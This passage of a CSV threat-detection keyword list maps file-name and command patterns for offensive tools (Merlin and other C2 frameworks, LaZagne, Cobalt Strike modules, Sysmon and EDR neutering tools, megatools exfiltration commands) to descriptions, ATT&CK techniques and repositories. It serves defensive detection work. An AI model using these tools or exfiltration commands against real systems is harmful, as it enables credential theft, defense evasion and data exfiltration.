!,N/A,N/A,N/A,N/A,N/A,N/A -*MATCH p=(u:User)-[:SQLAdmin]*(c:Computer) return p*,greyware_tool_keyword,Neo4j,Neo4j queries - Potential SQL Admins,T1210.002 - T1078.003 - T1046,TA0001 - TA0007 - TA0040,N/A,N/A,Reconnaissance,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*matterpreter*,offensive_tool_keyword,Github Username,github username hosting offensive tools ,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/matterpreter,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*matterpreter/DefenderCheck*,offensive_tool_keyword,DefenderCheck,Identifies the bytes that Microsoft Defender flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,1,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -*matterpreter/Shhmon*,offensive_tool_keyword,shhmon,Neutering Sysmon via driver unload,T1518.001 ,TA0007,N/A,N/A,Defense Evasion,https://github.com/matterpreter/Shhmon,1,1,N/A,N/A,3,210,35,2022-10-13T16:56:41Z,2019-09-12T14:13:19Z -*MattKeeley/Spoofy*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*MayankPandey01/Jira-Lens*,offensive_tool_keyword,Jira-Lens,Fast and customizable vulnerability scanner For JIRA written in Python,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/MayankPandey01/Jira-Lens,1,1,N/A,N/A,3,206,31,2022-08-23T09:57:52Z,2021-11-14T18:37:47Z -*mbrg/power-pwn*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*mcafee_epo2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*McpManagementPotato.*,offensive_tool_keyword,DCOMPotato,Service DCOM Object and SeImpersonatePrivilege abuse.,T1548.002 - T1134.002,TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/DCOMPotato,1,1,N/A,10,4,326,46,2022-12-09T01:57:53Z,2022-12-08T14:56:13Z -*md *.::$index_allocation*,greyware_tool_keyword,$index_allocation,creation of hidden folders (and file) via ...$.......::$index_allocation,T1027.001 - T1564.001,TA0005 ,N/A,N/A,Defense Evasion,https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*Md4-128.unverified.test-vectors.txt*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Md5-128.unverified.test-vectors.txt*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*mDNSSpoofer*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*MDSDLL_x64.dll*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*MDSDLL_x86.dll*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*mdsecactivebreach*,offensive_tool_keyword,Github Username,MDSecs ActiveBreach Team. own a github repo with lots of exploitation tools https://www.mdsec.co.uk/services/red-teaming/,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/mdsecactivebreach/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*mdsecactivebreach/CACTUSTORCH*,offensive_tool_keyword,cobaltstrike,CACTUSTORCH: Payload Generation for Adversary Simulations,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mdsecactivebreach/CACTUSTORCH,1,1,N/A,10,10,980,241,2018-07-03T06:47:36Z,2017-07-04T10:20:34Z -*mdsecactivebreach/Farmer*,offensive_tool_keyword,Farmer,Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.,T1557.001 - T1056.004 - T1078.003,TA0006 - TA0004 - TA0001,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/mdsecactivebreach/Farmer,1,1,N/A,10,4,308,49,2021-04-28T15:27:24Z,2021-02-22T14:32:29Z -*med0x2e/GadgetToJScript*,offensive_tool_keyword,GadgetToJScript,A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.,T1059.001 - T1078 - T1059.005,TA0002 - TA0004 - TA0001,N/A,N/A,Exploitation tools,https://github.com/med0x2e/GadgetToJScript,1,1,N/A,10,8,777,157,2021-07-26T17:35:40Z,2019-10-05T12:27:19Z -*med0x2e/SigFlip*,offensive_tool_keyword,C2 related tools,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*med0x2e/SigFlip*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*media_variable_file_cryptography.py*,offensive_tool_keyword,pxethief,PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager,T1555.004 - T1555.002,TA0006,N/A,N/A,Credential Access,https://github.com/MWR-CyberSec/PXEThief,1,1,N/A,N/A,3,220,27,2023-05-18T19:55:17Z,2022-08-12T22:16:46Z -*megacmd -conf * put *mega:*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*megadose/holehe*,offensive_tool_keyword,holehe,holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.,T1598.004 - T1592.002 - T1598.001,TA0003 - TA0009,N/A,N/A,Reconnaissance,https://github.com/megadose/holehe,1,1,N/A,6,10,5659,655,2023-09-15T21:14:10Z,2020-06-25T23:03:02Z -*megadose@protonmail.com*,offensive_tool_keyword,holehe,holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.,T1598.004 - T1592.002 - T1598.001,TA0003 - TA0009,N/A,N/A,Reconnaissance,https://github.com/megadose/holehe,1,1,N/A,6,10,5659,655,2023-09-15T21:14:10Z,2020-06-25T23:03:02Z -*megatools copy -l * -r *,greyware_tool_keyword,megatools,Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://github.com/megous/megatools,1,0,N/A,9,,N/A,,, -*megatools put *,greyware_tool_keyword,megatools,Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://github.com/megous/megatools,1,0,N/A,9,,N/A,,, -*meliht/Mr.SIP*,offensive_tool_keyword,Mr.SIP,Mr.SIP is a simple console based SIP-based Audit and Attack Tool. Originally it was developed to be used in academic work to help developing novel SIP-based DDoS attacks and then as an idea to convert it to a fully functional SIP-based penetration testing tool. So far Mr SIP resulted several academic research papers. and journal articles. Mr.SIP can also be used as SIP client simulator and SIP traffic generator.,T1522 - T1521 - T1523 - T1505 - T1506,TA0010 - TA0002 - TA0043,N/A,N/A,Exploitation tools,https://github.com/meliht/Mr.SIP,1,1,N/A,N/A,4,366,100,2023-05-21T08:11:20Z,2017-09-07T18:23:00Z -*Memcrashed-DDoS-Exploit*,offensive_tool_keyword,Memcrashed-DDoS-Exploit,This tool allows you to send forged UDP packets to Memcached servers obtained from Shodan.io,T1436 - T1498 - T1216 - T1190,TA0043 - TA0044 - TA0001,N/A,N/A,Exploitation tools,https://github.com/649/Memcrashed-DDoS-Exploit,1,1,N/A,N/A,10,1278,493,2022-12-02T07:14:59Z,2018-03-02T21:19:51Z -*memfd implant *.elf*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*memfd task *.elf*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*memory*mimipy.py*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*memory/onepassword.py*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*memorydump.py*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*memorydump.py*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*memreader *access_token*,offensive_tool_keyword,cobaltstrike,MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trainr3kt/MemReader_BoF,1,0,N/A,10,10,26,3,2022-05-12T18:46:02Z,2021-04-21T20:51:25Z -*MemReader_BoF.*,offensive_tool_keyword,cobaltstrike,MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trainr3kt/MemReader_BoF,1,1,N/A,10,10,26,3,2022-05-12T18:46:02Z,2021-04-21T20:51:25Z -*merlin-*.zip*,offensive_tool_keyword,mythic,Cross-platform post-exploitation HTTP Command & Control agent written in golang,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/merlin,1,1,N/A,10,10,57,10,2023-08-11T15:02:23Z,2021-01-25T12:36:46Z -*Merlin_v0.1Beta.zip*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*merlinAgent-*.7z*,offensive_tool_keyword,merlin,Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/Ne0nd0g/merlin,1,1,N/A,10,10,4618,763,2023-08-27T15:47:13Z,2017-01-06T11:18:20Z -*merlinAgent-*.exe*,offensive_tool_keyword,merlin,Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/Ne0nd0g/merlin,1,1,N/A,10,10,4618,763,2023-08-27T15:47:13Z,2017-01-06T11:18:20Z -*merlinAgent.exe*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*merlinAgent-Darwin-*,offensive_tool_keyword,merlin,Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/Ne0nd0g/merlin,1,1,N/A,10,10,4618,763,2023-08-27T15:47:13Z,2017-01-06T11:18:20Z -*merlinAgent-Linux-*,offensive_tool_keyword,merlin,Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/Ne0nd0g/merlin,1,1,N/A,10,10,4618,763,2023-08-27T15:47:13Z,2017-01-06T11:18:20Z -*merlinAgent-Windows-x64.exe*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*MerlinCheatSheet.pdf*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*merlinServer-*.7z*,offensive_tool_keyword,merlin,Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/Ne0nd0g/merlin,1,1,N/A,10,10,4618,763,2023-08-27T15:47:13Z,2017-01-06T11:18:20Z -*merlinServer-*.exe*,offensive_tool_keyword,merlin,Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/Ne0nd0g/merlin,1,1,N/A,10,10,4618,763,2023-08-27T15:47:13Z,2017-01-06T11:18:20Z -*merlinserver.go*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*merlinserver_windows_x64.exe*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*merlinServer-Linux*,offensive_tool_keyword,merlin,Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/Ne0nd0g/merlin,1,1,N/A,10,10,4618,763,2023-08-27T15:47:13Z,2017-01-06T11:18:20Z -*merlinServerLog.txt*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*mertdas/RedPersist*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,1,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*mertdas/SharpLDAP*,offensive_tool_keyword,SharpLDAP,tool written in C# that aims to do enumeration via LDAP queries,T1018 - T1069.003,TA0007 - TA0011,N/A,N/A,Discovery,https://github.com/mertdas/SharpLDAP,1,1,N/A,8,1,50,7,2023-01-14T21:52:36Z,2022-11-16T00:38:43Z -*mertdas/SharpTerminator*,offensive_tool_keyword,SharpTerminator,Terminate AV/EDR Processes using kernel driver,T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001,TA0007 - TA0008 - TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/mertdas/SharpTerminator,1,1,N/A,N/A,3,266,53,2023-06-12T00:38:54Z,2023-06-11T06:35:51Z -*MessageBox.Show*Pwned*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*messagebox_reflective.dll*,offensive_tool_keyword,SharPyShell,SharPyShell - tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -*met_inject.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 